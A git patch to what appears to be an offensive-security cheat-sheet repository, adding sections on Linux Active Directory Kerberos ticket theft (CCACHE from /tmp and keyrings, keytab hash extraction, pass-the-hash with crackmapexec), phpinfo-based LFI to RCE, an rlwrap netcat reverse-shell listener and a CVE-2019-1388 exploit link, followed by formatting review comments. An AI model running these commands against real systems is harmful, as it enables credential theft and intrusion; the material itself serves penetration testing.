From 3abaa3e23db719404bfdcfbc104ecd4d8f8d45dd Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 25 Nov 2019 23:12:06 +0100 Subject: [PATCH] Linux AD - Keyring, Keytab, CCACHE --- File Inclusion/README.md | 7 +- .../Active Directory Attack.md | 105 ++++++++++++------ .../Reverse Shell Cheatsheet.md | 4 + .../Windows - Privilege Escalation.md | 15 +++ 4 files changed, 97 insertions(+), 34 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index cfa22c2..265c394 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -272,9 +272,14 @@ print('[x] Something went wrong, please try again') ## LFI to RCE via phpinfo() -https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf +PHPinfo() displays the content of any variables such as **$_GET**, **$_POST** and **$_FILES**. + +> By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying the temporary file name. + Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py) +Research from https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf + ## LFI to RCE via controlled log file Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file. diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index d0ad6c7..2e8b144 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
@@ -56,9 +56,13 @@ - [Resource-Based Constrained Delegation](#resource-based-constrained-delegation) - [Relay delegation with mitm6](#relay-delegation-with-mitm6) - [PrivExchange attack](#privexchange-attack) - - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab) - [PXE Boot image attack](#pxe-boot-image-attack) - [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect) + - [Linux Active Directory](#linux-active-directory) + - [CCACHE ticket reuse from /tmp](#ccache-ticket-reuse-from-tmp) + - [CCACHE ticket reuse from keyring](#ccache-ticket-reuse-from-keyring) + - [CCACHE ticket reuse from keytab](#ccache-ticket-reuse-from-keytab) + - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab) - [References](#references) ## Tools 
@@ -1173,38 +1177,6 @@ python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip ``` - -### Extract accounts from /etc/krb5.keytab - -The service keys used by services that run as root are usually stored in the keytab file /etc/krb5.keytab. This service key is the equivalent of the service's password, and must be kept secure. - -Use [`klist`](https://adoptopenjdk.net/?variant=openjdk13&jvmVariant=hotspot) to read the keytab file and parse its content. The key that you see when the [key type](https://cwiki.apache.org/confluence/display/DIRxPMGT/Kerberos+EncryptionKey) is 23 is the actual NT Hash of the user. - -```powershell -$ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab -[...] -[26] Service principal: host/COMPUTER@DOMAIN - KVNO: 25 - Key type: 23 - Key: 6b3723410a3c54692e400a5862256e0a - Time stamp: Oct 07, 2019 09:12:02 -[...] -``` - -On macOS you can use `bifrost`. - -```powershell -./bifrost -action dump -source keytab -path test -``` - -Connect to the machine using the account and the hash with CME. - -```powershell -$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "6b3723410a3c54692e400a5862256e0a" -d "DOMAIN" -CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c54692e400a5862256e0a -``` - - ### PXE Boot image attack PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it. 
@@ -1291,6 +1263,73 @@ network.negotiate-auth.trusted-uris="https://aadg.windows.net.nsatc.net,https:// Navigate to any web application that is integrated with our AAD domain. Once at the Office365 logon screen, fill in the user name, while leaving the password field empty. Then press TAB or ENTER. + +## Linux Active Directory + +### CCACHE ticket reuse from /tmp + +List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache` + +> When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions + +### CCACHE ticket reuse from keyring + +Tool to extract Kerberos tickets from Linux kernel keys : https://github.com/TarlogicSecurity/tickey + +```powershell +[root@Lab-LSV01 /]# /tmp/tickey -i +[*] krb5 ccache_name = KEYRING:session:sess_%{uid} +[+] root detected, so... DUMP ALL THE TICKETS!! +[*] Trying to inject in tarlogic[1000] session... +[+] Successful injection at process 25723 of tarlogic[1000],look for tickets in /tmp/__krb_1000.ccache +[*] Trying to inject in velociraptor[1120601115] session... +[+] Successful injection at process 25794 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache +[*] Trying to inject in trex[1120601113] session... 
+[+] Successful injection at process 25820 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache +[X] [uid:0] Error retrieving tickets +``` + +### CCACHE ticket reuse from keytab + +```powershell +git clone https://github.com/its-a-feature/KeytabParser +python KeytabParser.py /etc/krb5.keytab +klist -k /etc/krb5.keytab +``` + +### Extract accounts from /etc/krb5.keytab + +The service keys used by services that run as root are usually stored in the keytab file /etc/krb5.keytab. This service key is the equivalent of the service's password, and must be kept secure. + +Use [`klist`](https://adoptopenjdk.net/?variant=openjdk13&jvmVariant=hotspot) to read the keytab file and parse its content. The key that you see when the [key type](https://cwiki.apache.org/confluence/display/DIRxPMGT/Kerberos+EncryptionKey) is 23 is the actual NT Hash of the user. + +```powershell +$ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab +[...] +[26] Service principal: host/COMPUTER@DOMAIN + KVNO: 25 + Key type: 23 + Key: 6b3723410a3c54692e400a5862256e0a + Time stamp: Oct 07, 2019 09:12:02 +[...] +``` + +On macOS you can use `bifrost`. + +```powershell +./bifrost -action dump -source keytab -path test +``` + +Connect to the machine using the account and the hash with CME. + +```powershell +$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "6b3723410a3c54692e400a5862256e0a" -d "DOMAIN" +CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c54692e400a5862256e0a +``` + + + + ## References * [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 5a4b317..5ccebd6 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md 
@@ -296,6 +296,10 @@ In order to catch a shell, you need to listen on the desired port. `rlwrap` will ```powershell rlwrap nc localhost 80 + +rlwrap -r -f . nc 127.0.0.1 4242 +-f . will make rlwrap use the current history file as a completion word list. +-r Put all words seen on in- and output on the completion list. ``` Sometimes, you want to access shortcuts, su, nano and autocomplete in a partially tty shell. diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index beb5e64..ab8f62e 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -36,6 +36,7 @@ * [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012) * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) + * [CVE-2019-1388](#cve-2019-1388) * [References](#references) ## Tools @@ -883,6 +884,20 @@ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=threa python2 send_and_execute.py 10.0.0.1 revshell.exe ``` +### CVE-2019-1388 + +Exploit : https://packetstormsecurity.com/files/14437/hhupd.exe.html + +Working on : +- Windows 7 +- Windows 10 LTSC 10240 + +Failing on : +- LTSC 2019 +- 1709 +- 1803 + +Detailed information about the vulnerability : https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege ## References
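Review bot: in the File Inclusion/README.md hunk (@@ -272,9 +272,14 @@), the block-quoted sentence "By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, ..." is separated from its source: the "Research from https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf" line lands two lines later, after the phpInfoLFI.py instruction, so the quote reads as the author's own words. Put the attribution directly under the quote, or cite it inline at the end of the quoted line. Also, "PHPinfo()" in the new first line, "PHPInfo" in the quote and "phpinfo()" in the section heading are three spellings of the same function; the PHP function name is lowercase `phpinfo()`, so use that throughout.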
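Review bot: in the table-of-contents hunk of Methodology and Resources/Active Directory Attack.md (@@ -56,9 +56,13 @@), the new "Linux Active Directory" entry appears at the same indentation as "PrivExchange attack" and "PXE Boot image attack", but the body hunk adds it as a `##` heading while "### PXE Boot image attack" is a `###` section; either demote it to `###` (with its four children as `####`) so the nesting matches the TOC, or indent the TOC entry at the level of the other `##` sections such as "Tools" and "References". The nested anchors (#ccache-ticket-reuse-from-tmp, #ccache-ticket-reuse-from-keyring, #ccache-ticket-reuse-from-keytab, #extract-accounts-from-etckrb5keytab) follow GitHub's heading-slug rules, so the links themselves resolve.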
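Review bot: in the @@ -1173,38 +1177,6 @@ hunk of Active Directory Attack.md, the removal takes the blank line after the Exchange2domain block's closing ``` together with the two blank lines that preceded "### PXE Boot image attack", so check that one blank line survives between the fence and the heading in the result; otherwise the heading sits directly against the code block. The removed section itself is re-added verbatim under the new Linux Active Directory heading, so this hunk is a pure move and loses nothing.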
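Review bot: in the @@ -1291,6 +1263,73 @@ hunk of Active Directory Attack.md, the heading "CCACHE ticket reuse from keytab" does not describe its content: /etc/krb5.keytab holds long-term service keys, not CCACHE tickets, and both `python KeytabParser.py /etc/krb5.keytab` and `klist -k /etc/krb5.keytab` read those keys, which is exactly what the next section, "Extract accounts from /etc/krb5.keytab", covers with `klist -t -K -e -k`; merge the two into one keytab section (or retitle the first so it names KeytabParser) so the same file is not explained twice under different names. Three smaller points in the same hunk: `env | grep KRB5CCNAME` shows where the credential cache is, not "the current ticket" (`klist` lists the tickets in that cache), so reword that sentence; the block quote about CCACHE files in /tmp carries no source line, unlike the phpinfo quote added in this same commit; and the hunk ends with three added blank lines before "## References" where one is enough. Finally, the re-added text still links `klist` to the AdoptOpenJDK download, i.e. the Java `klist.exe` used in the Windows example, which is an odd pointer under a "Linux Active Directory" heading when the preceding subsection already shows the native `klist -k`.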
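Review bot: in the Methodology and Resources/Reverse Shell Cheatsheet.md hunk (@@ -296,6 +296,10 @@), the two explanatory lines "-f . will make rlwrap use the current history file as a completion word list." and "-r Put all words seen on in- and output on the completion list." are added inside the ```powershell fence, so they render as if they were commands following `rlwrap -r -f . nc 127.0.0.1 4242` and break a copy-paste of the block; move them below the fence as prose, or prefix each with `#` so they read as comments.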
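Review bot: in the @@ -883,6 +884,20 @@ hunk of Windows - Privilege Escalation.md, the line "Detailed information about the vulnerability : https://www.zerodayinitiative.com/..." follows "- 1803" with no blank line, so Markdown treats it as a lazy continuation of that list item and renders "1803 Detailed information about the vulnerability ..." as one bullet; add a blank line after "- 1803". The section also never says what the bug is or which update addresses it: a one-line description next to the ZDI link would let a reader judge whether it applies before fetching hhupd.exe from packetstormsecurity.com, and the "Working on" / "Failing on" entries should be written as "Windows 10 1709", "Windows 10 1803" and "Windows 10 LTSC 2019" so the bare build names are unambiguous alongside "Windows 10 LTSC 10240".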